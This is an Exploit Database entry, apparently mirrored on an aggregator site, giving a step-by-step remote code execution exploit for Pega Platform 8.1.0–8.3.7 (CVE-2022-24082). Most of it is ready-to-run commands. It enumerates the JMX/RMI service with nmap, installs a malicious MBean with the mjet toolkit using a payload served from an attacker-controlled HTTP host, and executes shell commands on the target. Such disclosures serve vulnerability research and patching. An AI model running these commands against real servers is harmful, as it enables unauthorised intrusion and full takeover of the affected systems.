Pega Platform 8.1.0 – Remote Code Execution (RCE)

• Exploit Database
• 14 阅读

• 作者： Marcin Wolak
  日期： 2023-03-28
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51099/

• # Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
  # Google Dork: N/A
  # Date: 20 Oct 2022
  # Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
  # Vendor Homepage: www.pega.com
  # Software Link: Not Available
  # Version: 8.1.0 on-premise and higher, up to 8.3.7
  # Tested on: Red Hat Enterprise 7
  # CVE : CVE-2022-24082
  
  ;Dumping RMI registry:
  nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>
  
  ;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
  :<PORT>)
  ;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
  dump, but actually listens on the network as well):
  nmap -sT -sV -p <PORT> <IP Address>
  
  ;Exploitation requires:
  ;- JVM
  ;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
  ;- jython
  ;Installing mbean for remote code execution
  java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
  Address> 9999 install random_password http://<Local IP to Serve Payload
  over HTTP>:6666 6666
  
  ;Execution of commands id & ifconfig
  java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
  Address> 9999 command random_password "id;ifconfig"
  
  ;More details:
  https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
  
  
  Kind Regards,
  Marcin Wolak